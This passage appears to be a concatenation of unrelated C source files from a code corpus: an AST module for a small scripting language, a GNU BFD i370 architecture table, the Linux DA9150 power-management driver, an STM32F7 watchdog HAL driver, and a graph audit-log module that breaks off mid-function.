fh_src_loc loc, enum fh_expr_type type, size_t extra_size) { UNUSED(ast); struct fh_p_expr *expr = malloc(sizeof(struct fh_p_expr) + extra_size); if (! expr) return NULL; expr->next = NULL; expr->type = type; expr->loc = loc; return expr; } struct fh_p_stmt *fh_new_stmt(struct fh_ast *ast, struct fh_src_loc loc, enum fh_stmt_type type, size_t extra_size) { UNUSED(ast); struct fh_p_stmt *stmt = malloc(sizeof(struct fh_p_stmt) + extra_size); if (! stmt) return NULL; stmt->next = NULL; stmt->type = type; stmt->loc = loc; return stmt; } /* node utility functions */ int fh_expr_list_size(struct fh_p_expr *list) { int n = 0; for (struct fh_p_expr *e = list; e != NULL; e = e->next) n++; return n; } int fh_stmt_list_size(struct fh_p_stmt *list) { int n = 0; for (struct fh_p_stmt *s = list; s != NULL; s = s->next) n++; return n; } /* node destruction */ void fh_free_named_func(struct fh_p_named_func *func) { fh_free_expr(func->func); free(func); } void fh_free_named_func_list(struct fh_p_named_func *list) { struct fh_p_named_func *f = list; while (f != NULL) { struct fh_p_named_func *next = f->next; fh_free_named_func(f); f = next; } } void fh_free_expr_children(struct fh_p_expr *expr) { switch (expr->type) { case EXPR_NONE: return; case EXPR_VAR: return; case EXPR_NULL: return; case EXPR_BOOL: return; case EXPR_NUMBER: return; case EXPR_STRING: return; case EXPR_UN_OP: fh_free_expr(expr->data.un_op.arg); return; case EXPR_BIN_OP: fh_free_expr(expr->data.bin_op.left); fh_free_expr(expr->data.bin_op.right); return; case EXPR_INDEX: fh_free_expr(expr->data.index.container); fh_free_expr(expr->data.index.index); return; case EXPR_FUNC_CALL: fh_free_expr(expr->data.func_call.func); fh_free_expr_list(expr->data.func_call.arg_list); return; case EXPR_ARRAY_LIT: fh_free_expr_list(expr->data.array_lit.elem_list); return; case EXPR_MAP_LIT: fh_free_expr_list(expr->data.map_lit.elem_list); return; case EXPR_FUNC: fh_free_block(expr->data.func.body); return; } fprintf(stderr, "INTERNAL ERROR: unknown expression type '%d'\n", expr->type); } void fh_free_expr(struct fh_p_expr *expr) { if (expr) { fh_free_expr_children(expr); free(expr); } } void fh_free_expr_list(struct fh_p_expr *list) { struct fh_p_expr *e = list; while (e != NULL) { struct fh_p_expr *next = e->next; fh_free_expr(e); e = next; } } void fh_free_stmt_children(struct fh_p_stmt *stmt) { switch (stmt->type) { case STMT_NONE: return; case STMT_EMPTY: return; case STMT_BREAK: return; case STMT_CONTINUE: return; case STMT_EXPR: fh_free_expr(stmt->data.expr); return; case STMT_VAR_DECL: fh_free_expr(stmt->data.decl.val); return; case STMT_BLOCK: fh_free_block(stmt->data.block); return; case STMT_RETURN: fh_free_expr(stmt->data.ret.val); return; case STMT_IF: fh_free_expr(stmt->data.stmt_if.test); fh_free_stmt(stmt->data.stmt_if.true_stmt); fh_free_stmt(stmt->data.stmt_if.false_stmt); return; case STMT_WHILE: fh_free_expr(stmt->data.stmt_while.test); fh_free_stmt(stmt->data.stmt_while.stmt); return; } fprintf(stderr, "INTERNAL ERROR: unknown statement type '%d'\n", stmt->type); } void fh_free_stmt(struct fh_p_stmt *stmt) { if (stmt) { fh_free_stmt_children(stmt); free(stmt); } } void fh_free_stmt_list(struct fh_p_stmt *list) { struct fh_p_stmt *s = list; while (s != NULL) { struct fh_p_stmt *next = s->next; fh_free_stmt(s); s = next; } } void fh_free_block(struct fh_p_stmt_block block) { fh_free_stmt_list(block.stmt_list); } int fh_ast_visit_expr_nodes(struct fh_p_expr *expr, int (*visit)(struct fh_p_expr *expr, void *data), void *data) { int ret; if ((ret = visit(expr, data)) != 0) return ret; switch (expr->type) { case EXPR_NONE: return 0; case EXPR_VAR: return 0; case EXPR_NULL: return 0; case EXPR_BOOL: return 0; case EXPR_NUMBER: return 0; case EXPR_STRING: return 0; case EXPR_FUNC: return 0; case EXPR_UN_OP: if ((ret = fh_ast_visit_expr_nodes(expr->data.un_op.arg, visit, data)) != 0) return ret; return 0; case EXPR_BIN_OP: if ((ret = fh_ast_visit_expr_nodes(expr->data.bin_op.left, visit, data)) != 0) return ret; if ((ret = fh_ast_visit_expr_nodes(expr->data.bin_op.right, visit, data)) != 0) return ret; return 0; case EXPR_INDEX: if ((ret = fh_ast_visit_expr_nodes(expr->data.index.container, visit, data)) != 0) return ret; if ((ret = fh_ast_visit_expr_nodes(expr->data.index.index, visit, data)) != 0) return ret; return 0; case EXPR_FUNC_CALL: if ((ret = fh_ast_visit_expr_nodes(expr->data.func_call.func, visit, data)) != 0) return ret; for (struct fh_p_expr *e = expr->data.func_call.arg_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; case EXPR_ARRAY_LIT: for (struct fh_p_expr *e = expr->data.array_lit.elem_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; case EXPR_MAP_LIT: for (struct fh_p_expr *e = expr->data.map_lit.elem_list; e != NULL; e = e->next) { if ((ret = fh_ast_visit_expr_nodes(e, visit, data)) != 0) return ret; } return 0; } fprintf(stderr, "INTERNAL ERROR: unknown expression type '%d'\n", expr->type); return 0; }
383392.c
/* BFD i370 CPU definition Copyright (C) 1994-2014 Free Software Foundation, Inc. Contributed by Ian Lance Taylor, Cygnus Support. Hacked by Linas Vepstas <linas@linas.org> in 1998, 1999 This file is part of BFD, the Binary File Descriptor library. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */ #include "sysdep.h" #include "bfd.h" #include "libbfd.h" static const bfd_arch_info_type arch_info_struct[] = { /* Hack alert: old old machines are really 16 and 24 bit arch ... */ { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 360, /* For the 360. */ "i370", "i370:360", 3, FALSE, /* Not the default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, &arch_info_struct[1] }, { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 370, /* For the 370. */ "i370", "i370:370", 3, FALSE, /* Not the default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, 0 }, }; const bfd_arch_info_type bfd_i370_arch = { 32, /* 32 bits in a word. */ 32, /* 32 bits in an address. */ 8, /* 8 bits in a byte. */ bfd_arch_i370, 0, /* For the 360/370 common architecture. */ "i370", "i370:common", 3, TRUE, /* The default. */ bfd_default_compatible, bfd_default_scan, bfd_arch_default_fill, & arch_info_struct[0] };
105048.c
/* * DA9150 Core MFD Driver * * Copyright (c) 2014 Dialog Semiconductor * * Author: Adam Thomson <Adam.Thomson.Opensource@diasemi.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/platform_device.h> #include <linux/i2c.h> #include <linux/regmap.h> #include <linux/slab.h> #include <linux/irq.h> #include <linux/interrupt.h> #include <linux/mfd/core.h> #include <linux/mfd/da9150/core.h> #include <linux/mfd/da9150/registers.h> static bool da9150_volatile_reg(struct device *dev, unsigned int reg) { switch (reg) { case DA9150_PAGE_CON: case DA9150_STATUS_A: case DA9150_STATUS_B: case DA9150_STATUS_C: case DA9150_STATUS_D: case DA9150_STATUS_E: case DA9150_STATUS_F: case DA9150_STATUS_G: case DA9150_STATUS_H: case DA9150_STATUS_I: case DA9150_STATUS_J: case DA9150_STATUS_K: case DA9150_STATUS_L: case DA9150_STATUS_N: case DA9150_FAULT_LOG_A: case DA9150_FAULT_LOG_B: case DA9150_EVENT_E: case DA9150_EVENT_F: case DA9150_EVENT_G: case DA9150_EVENT_H: case DA9150_CONTROL_B: case DA9150_CONTROL_C: case DA9150_GPADC_MAN: case DA9150_GPADC_RES_A: case DA9150_GPADC_RES_B: case DA9150_ADETVB_CFG_C: case DA9150_ADETD_STAT: case DA9150_ADET_CMPSTAT: case DA9150_ADET_CTRL_A: case DA9150_PPR_TCTR_B: case DA9150_COREBTLD_STAT_A: case DA9150_CORE_DATA_A: case DA9150_CORE_DATA_B: case DA9150_CORE_DATA_C: case DA9150_CORE_DATA_D: case DA9150_CORE2WIRE_STAT_A: case DA9150_FW_CTRL_C: case DA9150_FG_CTRL_B: case DA9150_FW_CTRL_B: case DA9150_GPADC_CMAN: case DA9150_GPADC_CRES_A: case DA9150_GPADC_CRES_B: case DA9150_CC_ICHG_RES_A: case DA9150_CC_ICHG_RES_B: case DA9150_CC_IAVG_RES_A: case DA9150_CC_IAVG_RES_B: case DA9150_TAUX_CTRL_A: case DA9150_TAUX_VALUE_H: case DA9150_TAUX_VALUE_L: case DA9150_TBAT_RES_A: case DA9150_TBAT_RES_B: return true; default: return false; } } static const struct regmap_range_cfg da9150_range_cfg[] = { { .range_min = DA9150_PAGE_CON, .range_max = DA9150_TBAT_RES_B, .selector_reg = DA9150_PAGE_CON, .selector_mask = DA9150_I2C_PAGE_MASK, .selector_shift = DA9150_I2C_PAGE_SHIFT, .window_start = 0, .window_len = 256, }, }; static const struct regmap_config da9150_regmap_config = { .reg_bits = 8, .val_bits = 8, .ranges = da9150_range_cfg, .num_ranges = ARRAY_SIZE(da9150_range_cfg), .max_register = DA9150_TBAT_RES_B, .cache_type = REGCACHE_RBTREE, .volatile_reg = da9150_volatile_reg, }; u8 da9150_reg_read(struct da9150 *da9150, u16 reg) { int val, ret; ret = regmap_read(da9150->regmap, reg, &val); if (ret) dev_err(da9150->dev, "Failed to read from reg 0x%x: %d\n", reg, ret); return (u8) val; } EXPORT_SYMBOL_GPL(da9150_reg_read); void da9150_reg_write(struct da9150 *da9150, u16 reg, u8 val) { int ret; ret = regmap_write(da9150->regmap, reg, val); if (ret) dev_err(da9150->dev, "Failed to write to reg 0x%x: %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_reg_write); void da9150_set_bits(struct da9150 *da9150, u16 reg, u8 mask, u8 val) { int ret; ret = regmap_update_bits(da9150->regmap, reg, mask, val); if (ret) dev_err(da9150->dev, "Failed to set bits in reg 0x%x: %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_set_bits); void da9150_bulk_read(struct da9150 *da9150, u16 reg, int count, u8 *buf) { int ret; ret = regmap_bulk_read(da9150->regmap, reg, buf, count); if (ret) dev_err(da9150->dev, "Failed to bulk read from reg 0x%x: %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_bulk_read); void da9150_bulk_write(struct da9150 *da9150, u16 reg, int count, const u8 *buf) { int ret; ret = regmap_raw_write(da9150->regmap, reg, buf, count); if (ret) dev_err(da9150->dev, "Failed to bulk write to reg 0x%x %d\n", reg, ret); } EXPORT_SYMBOL_GPL(da9150_bulk_write); static struct regmap_irq da9150_irqs[] = { [DA9150_IRQ_VBUS] = { .reg_offset = 0, .mask = DA9150_E_VBUS_MASK, }, [DA9150_IRQ_CHG] = { .reg_offset = 0, .mask = DA9150_E_CHG_MASK, }, [DA9150_IRQ_TCLASS] = { .reg_offset = 0, .mask = DA9150_E_TCLASS_MASK, }, [DA9150_IRQ_TJUNC] = { .reg_offset = 0, .mask = DA9150_E_TJUNC_MASK, }, [DA9150_IRQ_VFAULT] = { .reg_offset = 0, .mask = DA9150_E_VFAULT_MASK, }, [DA9150_IRQ_CONF] = { .reg_offset = 1, .mask = DA9150_E_CONF_MASK, }, [DA9150_IRQ_DAT] = { .reg_offset = 1, .mask = DA9150_E_DAT_MASK, }, [DA9150_IRQ_DTYPE] = { .reg_offset = 1, .mask = DA9150_E_DTYPE_MASK, }, [DA9150_IRQ_ID] = { .reg_offset = 1, .mask = DA9150_E_ID_MASK, }, [DA9150_IRQ_ADP] = { .reg_offset = 1, .mask = DA9150_E_ADP_MASK, }, [DA9150_IRQ_SESS_END] = { .reg_offset = 1, .mask = DA9150_E_SESS_END_MASK, }, [DA9150_IRQ_SESS_VLD] = { .reg_offset = 1, .mask = DA9150_E_SESS_VLD_MASK, }, [DA9150_IRQ_FG] = { .reg_offset = 2, .mask = DA9150_E_FG_MASK, }, [DA9150_IRQ_GP] = { .reg_offset = 2, .mask = DA9150_E_GP_MASK, }, [DA9150_IRQ_TBAT] = { .reg_offset = 2, .mask = DA9150_E_TBAT_MASK, }, [DA9150_IRQ_GPIOA] = { .reg_offset = 2, .mask = DA9150_E_GPIOA_MASK, }, [DA9150_IRQ_GPIOB] = { .reg_offset = 2, .mask = DA9150_E_GPIOB_MASK, }, [DA9150_IRQ_GPIOC] = { .reg_offset = 2, .mask = DA9150_E_GPIOC_MASK, }, [DA9150_IRQ_GPIOD] = { .reg_offset = 2, .mask = DA9150_E_GPIOD_MASK, }, [DA9150_IRQ_GPADC] = { .reg_offset = 2, .mask = DA9150_E_GPADC_MASK, }, [DA9150_IRQ_WKUP] = { .reg_offset = 3, .mask = DA9150_E_WKUP_MASK, }, }; static struct regmap_irq_chip da9150_regmap_irq_chip = { .name = "da9150_irq", .status_base = DA9150_EVENT_E, .mask_base = DA9150_IRQ_MASK_E, .ack_base = DA9150_EVENT_E, .num_regs = DA9150_NUM_IRQ_REGS, .irqs = da9150_irqs, .num_irqs = ARRAY_SIZE(da9150_irqs), }; static struct resource da9150_gpadc_resources[] = { { .name = "GPADC", .start = DA9150_IRQ_GPADC, .end = DA9150_IRQ_GPADC, .flags = IORESOURCE_IRQ, }, }; static struct resource da9150_charger_resources[] = { { .name = "CHG_STATUS", .start = DA9150_IRQ_CHG, .end = DA9150_IRQ_CHG, .flags = IORESOURCE_IRQ, }, { .name = "CHG_TJUNC", .start = DA9150_IRQ_TJUNC, .end = DA9150_IRQ_TJUNC, .flags = IORESOURCE_IRQ, }, { .name = "CHG_VFAULT", .start = DA9150_IRQ_VFAULT, .end = DA9150_IRQ_VFAULT, .flags = IORESOURCE_IRQ, }, { .name = "CHG_VBUS", .start = DA9150_IRQ_VBUS, .end = DA9150_IRQ_VBUS, .flags = IORESOURCE_IRQ, }, }; static struct mfd_cell da9150_devs[] = { { .name = "da9150-gpadc", .of_compatible = "dlg,da9150-gpadc", .resources = da9150_gpadc_resources, .num_resources = ARRAY_SIZE(da9150_gpadc_resources), }, { .name = "da9150-charger", .of_compatible = "dlg,da9150-charger", .resources = da9150_charger_resources, .num_resources = ARRAY_SIZE(da9150_charger_resources), }, }; static int da9150_probe(struct i2c_client *client, const struct i2c_device_id *id) { struct da9150 *da9150; struct da9150_pdata *pdata = dev_get_platdata(&client->dev); int ret; da9150 = devm_kzalloc(&client->dev, sizeof(*da9150), GFP_KERNEL); if (!da9150) return -ENOMEM; da9150->dev = &client->dev; da9150->irq = client->irq; i2c_set_clientdata(client, da9150); da9150->regmap = devm_regmap_init_i2c(client, &da9150_regmap_config); if (IS_ERR(da9150->regmap)) { ret = PTR_ERR(da9150->regmap); dev_err(da9150->dev, "Failed to allocate register map: %d\n", ret); return ret; } da9150->irq_base = pdata ? pdata->irq_base : -1; ret = regmap_add_irq_chip(da9150->regmap, da9150->irq, IRQF_TRIGGER_LOW | IRQF_ONESHOT, da9150->irq_base, &da9150_regmap_irq_chip, &da9150->regmap_irq_data); if (ret) return ret; da9150->irq_base = regmap_irq_chip_get_base(da9150->regmap_irq_data); enable_irq_wake(da9150->irq); ret = mfd_add_devices(da9150->dev, -1, da9150_devs, ARRAY_SIZE(da9150_devs), NULL, da9150->irq_base, NULL); if (ret) { dev_err(da9150->dev, "Failed to add child devices: %d\n", ret); regmap_del_irq_chip(da9150->irq, da9150->regmap_irq_data); return ret; } return 0; } static int da9150_remove(struct i2c_client *client) { struct da9150 *da9150 = i2c_get_clientdata(client); regmap_del_irq_chip(da9150->irq, da9150->regmap_irq_data); mfd_remove_devices(da9150->dev); return 0; } static void da9150_shutdown(struct i2c_client *client) { struct da9150 *da9150 = i2c_get_clientdata(client); /* Make sure we have a wakup source for the device */ da9150_set_bits(da9150, DA9150_CONFIG_D, DA9150_WKUP_PM_EN_MASK, DA9150_WKUP_PM_EN_MASK); /* Set device to DISABLED mode */ da9150_set_bits(da9150, DA9150_CONTROL_C, DA9150_DISABLE_MASK, DA9150_DISABLE_MASK); } static const struct i2c_device_id da9150_i2c_id[] = { { "da9150", }, { } }; MODULE_DEVICE_TABLE(i2c, da9150_i2c_id); static const struct of_device_id da9150_of_match[] = { { .compatible = "dlg,da9150", }, { } }; MODULE_DEVICE_TABLE(of, da9150_of_match); static struct i2c_driver da9150_driver = { .driver = { .name = "da9150", .of_match_table = of_match_ptr(da9150_of_match), }, .probe = da9150_probe, .remove = da9150_remove, .shutdown = da9150_shutdown, .id_table = da9150_i2c_id, }; module_i2c_driver(da9150_driver); MODULE_DESCRIPTION("MFD Core Driver for DA9150"); MODULE_AUTHOR("Adam Thomson <Adam.Thomson.Opensource@diasemi.com>"); MODULE_LICENSE("GPL");
810094.c
/** ****************************************************************************** * @file stm32f7xx_hal_wwdg.c * @author MCD Application Team * @version V1.1.1 * @date 01-July-2016 * @brief WWDG HAL module driver. * This file provides firmware functions to manage the following * functionalities of the Window Watchdog (WWDG) peripheral: * + Initialization and Configuration function * + IO operation functions @verbatim ============================================================================== ##### WWDG specific features ##### ============================================================================== [..] Once enabled the WWDG generates a system reset on expiry of a programmed time period, unless the program refreshes the counter (T[6;0] downcounter) before reaching 0x3F value (i.e. a reset is generated when the counter value rolls over from 0x40 to 0x3F). (+) An MCU reset is also generated if the counter value is refreshed before the counter has reached the refresh window value. This implies that the counter must be refreshed in a limited window. (+) Once enabled the WWDG cannot be disabled except by a system reset. (+) WWDGRST flag in RCC_CSR register informs when a WWDG reset has occurred (check available with __HAL_RCC_GET_FLAG(RCC_FLAG_WWDGRST)). (+) The WWDG downcounter input clock is derived from the APB clock divided by a programmable prescaler. (+) WWDG downcounter clock (Hz) = PCLK1 / (4096 * Prescaler) (+) WWDG timeout (ms) = (1000 * (T[5;0] + 1)) / (WWDG downcounter clock) where T[5;0] are the lowest 6 bits of downcounter. (+) WWDG Counter refresh is allowed between the following limits : (++) min time (ms) = (1000 * (T[5;0] - Window)) / (WWDG downcounter clock) (++) max time (ms) = (1000 * (T[5;0] - 0x40)) / (WWDG downcounter clock) (+) Min-max timeout value @80 MHz(PCLK1): ~51.2 us / ~26.22 ms (+) The Early Wakeup Interrupt (EWI) can be used if specific safety operations or data logging must be performed before the actual reset is generated. When the downcounter reaches the value 0x40, an EWI interrupt is generated and the corresponding interrupt service routine (ISR) can be used to trigger specific actions (such as communications or data logging), before resetting the device. In some applications, the EWI interrupt can be used to manage a software system check and/or system recovery/graceful degradation, without generating a WWDG reset. In this case, the corresponding interrupt service routine (ISR) should reload the WWDG counter to avoid the WWDG reset, then trigger the required actions. Note:When the EWI interrupt cannot be served, e.g. due to a system lock in a higher priority task, the WWDG reset will eventually be generated. (+) Debug mode : When the microcontroller enters debug mode (core halted), the WWDG counter either continues to work normally or stops, depending on DBG_WWDG_STOP configuration bit in DBG module, accessible through __HAL_DBGMCU_FREEZE_WWDG() and __HAL_DBGMCU_UNFREEZE_WWDG() macros ##### How to use this driver ##### ============================================================================== [..] (+) Enable WWDG APB1 clock using __HAL_RCC_WWDG_CLK_ENABLE(). (+) Set the WWDG prescaler, refresh window, counter value and Early Wakeup Interrupt mode using using HAL_WWDG_Init() function. This enables WWDG peripheral and the downcounter starts downcounting from given counter value. Init function can be called again to modify all watchdog parameters, however if EWI mode has been set once, it can't be clear until next reset. (+) The application program must refresh the WWDG counter at regular intervals during normal operation to prevent an MCU reset using HAL_WWDG_Refresh() function. This operation must occur only when the counter is lower than the window value already programmed. (+) if Early Wakeup Interrupt mode is enable an interrupt is generated when the counter reaches 0x40. User can add his own code in weak function HAL_WWDG_EarlyWakeupCallback(). *** WWDG HAL driver macros list *** ================================== [..] Below the list of most used macros in WWDG HAL driver. (+) __HAL_WWDG_GET_IT_SOURCE: Check the selected WWDG's interrupt source. (+) __HAL_WWDG_GET_FLAG: Get the selected WWDG's flag status. (+) __HAL_WWDG_CLEAR_FLAG: Clear the WWDG's pending flags. @endverbatim ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2016 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ /* Includes ------------------------------------------------------------------*/ #include "stm32f7xx_hal.h" /** @addtogroup STM32F7xx_HAL_Driver * @{ */ #ifdef HAL_WWDG_MODULE_ENABLED /** @defgroup WWDG WWDG * @brief WWDG HAL module driver. * @{ */ /* Private typedef -----------------------------------------------------------*/ /* Private define ------------------------------------------------------------*/ /* Private macro -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @defgroup WWDG_Exported_Functions WWDG Exported Functions * @{ */ /** @defgroup WWDG_Exported_Functions_Group1 Initialization and Configuration functions * @brief Initialization and Configuration functions. * @verbatim ============================================================================== ##### Initialization and Configuration functions ##### ============================================================================== [..] This section provides functions allowing to: (+) Initialize and start the WWDG according to the specified parameters in the WWDG_InitTypeDef of associated handle. (+) Initialize the WWDG MSP. @endverbatim * @{ */ /** * @brief Initialize the WWDG according to the specified. * parameters in the WWDG_InitTypeDef of associated handle. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval HAL status */ HAL_StatusTypeDef HAL_WWDG_Init(WWDG_HandleTypeDef *hwwdg) { /* Check the WWDG handle allocation */ if(hwwdg == NULL) { return HAL_ERROR; } /* Check the parameters */ assert_param(IS_WWDG_ALL_INSTANCE(hwwdg->Instance)); assert_param(IS_WWDG_PRESCALER(hwwdg->Init.Prescaler)); assert_param(IS_WWDG_WINDOW(hwwdg->Init.Window)); assert_param(IS_WWDG_COUNTER(hwwdg->Init.Counter)); assert_param(IS_WWDG_EWI_MODE(hwwdg->Init.EWIMode)); /* Init the low level hardware */ HAL_WWDG_MspInit(hwwdg); /* Set WWDG Counter */ WRITE_REG(hwwdg->Instance->CR, (WWDG_CR_WDGA | hwwdg->Init.Counter)); /* Set WWDG Prescaler and Window */ WRITE_REG(hwwdg->Instance->CFR, (hwwdg->Init.EWIMode | hwwdg->Init.Prescaler | hwwdg->Init.Window)); /* Return function status */ return HAL_OK; } /** * @brief Initialize the WWDG MSP. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @note When rewriting this function in user file, mechanism may be added * to avoid multiple initialize when HAL_WWDG_Init function is called * again to change parameters. * @retval None */ __weak void HAL_WWDG_MspInit(WWDG_HandleTypeDef *hwwdg) { /* Prevent unused argument(s) compilation warning */ UNUSED(hwwdg); /* NOTE: This function should not be modified, when the callback is needed, the HAL_WWDG_MspInit could be implemented in the user file */ } /** * @} */ /** @defgroup WWDG_Exported_Functions_Group2 IO operation functions * @brief IO operation functions * @verbatim ============================================================================== ##### IO operation functions ##### ============================================================================== [..] This section provides functions allowing to: (+) Refresh the WWDG. (+) Handle WWDG interrupt request and associated function callback. @endverbatim * @{ */ /** * @brief Refresh the WWDG. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval HAL status */ HAL_StatusTypeDef HAL_WWDG_Refresh(WWDG_HandleTypeDef *hwwdg) { /* Write to WWDG CR the WWDG Counter value to refresh with */ WRITE_REG(hwwdg->Instance->CR, (hwwdg->Init.Counter)); /* Return function status */ return HAL_OK; } /** * @brief Handle WWDG interrupt request. * @note The Early Wakeup Interrupt (EWI) can be used if specific safety operations * or data logging must be performed before the actual reset is generated. * The EWI interrupt is enabled by calling HAL_WWDG_Init function with * EWIMode set to WWDG_EWI_ENABLE. * When the downcounter reaches the value 0x40, and EWI interrupt is * generated and the corresponding Interrupt Service Routine (ISR) can * be used to trigger specific actions (such as communications or data * logging), before resetting the device. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval None */ void HAL_WWDG_IRQHandler(WWDG_HandleTypeDef *hwwdg) { /* Check if Early Wakeup Interrupt is enable */ if(__HAL_WWDG_GET_IT_SOURCE(hwwdg, WWDG_IT_EWI) != RESET) { /* Check if WWDG Early Wakeup Interrupt occurred */ if(__HAL_WWDG_GET_FLAG(hwwdg, WWDG_FLAG_EWIF) != RESET) { /* Clear the WWDG Early Wakeup flag */ __HAL_WWDG_CLEAR_FLAG(hwwdg, WWDG_FLAG_EWIF); /* Early Wakeup callback */ HAL_WWDG_EarlyWakeupCallback(hwwdg); } } } /** * @brief WWDG Early Wakeup callback. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval None */ __weak void HAL_WWDG_EarlyWakeupCallback(WWDG_HandleTypeDef* hwwdg) { /* Prevent unused argument(s) compilation warning */ UNUSED(hwwdg); /* NOTE: This function should not be modified, when the callback is needed, the HAL_WWDG_EarlyWakeupCallback could be implemented in the user file */ } /** * @} */ /** * @} */ #endif /* HAL_WWDG_MODULE_ENABLED */ /** * @} */ /** * @} */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
724070.c
/** * Little module to attach an audit trail to a graph_t struct. * * Author: Paul McCarthy <pauld.mccarthy@gmail.com> */ #include <string.h> #include <stdint.h> #include <stdlib.h> #include "util/array.h" #include "graph/graph.h" #include "graph/graph_log.h" /** * Frees the memory used by the given trailx. */ static void _log_free( void *log /**< pointer to an array_t struct containing messages */ ); uint8_t graph_log_init(graph_t *g) { array_t *log; log = calloc(sizeof(array_t), 1); if (log == NULL) goto fail; if (array_create(log, sizeof(char *), 10)) goto fail; g->ctx[ _GRAPH_LOG_CTX_LOC_] = log; g->ctx_free[_GRAPH_LOG_CTX_LOC_] = _log_free; return 0; fail: if (log != NULL) free(log); return 1; } void _log_free(void *vlog) { array_t *log; char *msg; uint64_t i; log = vlog; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); if (msg != NULL) free(msg); } array_free(log); } uint8_t graph_log_exists(graph_t *g) { return g->ctx[_GRAPH_LOG_CTX_LOC_] != NULL ? 1 : 0; } uint16_t graph_log_num_msgs(graph_t *g) { array_t *log; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; return log->size; return 0; } char * graph_log_get_msg(graph_t *g, uint16_t i) { array_t *log; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return NULL; if (i >= log->size) return NULL; return *(char **)array_getd(log, i); } uint8_t graph_log_add(graph_t *g, char *msg) { array_t *log; char *msgcpy; uint32_t len; msgcpy = NULL; len = strlen(msg); log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; msgcpy = malloc(len+1); if (msgcpy == NULL) goto fail; strcpy(msgcpy, msg); if (array_append(log, &msgcpy)) goto fail; return 0; fail: if (msgcpy!= NULL) free(msgcpy); return 1; } uint8_t graph_log_copy(graph_t *gin, graph_t *gout) { uint32_t i; uint16_t nmsgs; char *msg; if (gin == NULL) goto fail; if (gout == NULL) goto fail; if (!graph_log_exists(gout)) { if (graph_log_init(gout)) goto fail; } if (!graph_log_exists(gin)) return 0; nmsgs = graph_log_num_msgs(gin); for (i = 0; i < nmsgs; i++) { msg = graph_log_get_msg(gin, i); if (msg == NULL) continue; if (graph_log_add(gout, msg)) goto fail; } return 0; fail: return 1; } uint16_t graph_log_total_len(graph_t *g) { uint64_t i; uint16_t len; array_t *log; char *msg; len = 0; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); len += strlen(msg); } return len; } uint8_t graph_log_import(graph_t *g, char *data, char *delim) { int32_t len; uint16_t dlen; array_t *log; char *msg; char *substr; uint16_t substrlen; msg = NULL; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; len = strlen(data); dlen = strlen(delim); if (log == NULL) return 0; while (len > 0) { substr = strstr(data, delim); if (substr == NULL) substrlen = len; else substrlen = substr - data; if (substrlen > 0) { msg = calloc(substrlen+1, 1); if (msg == NULL) goto 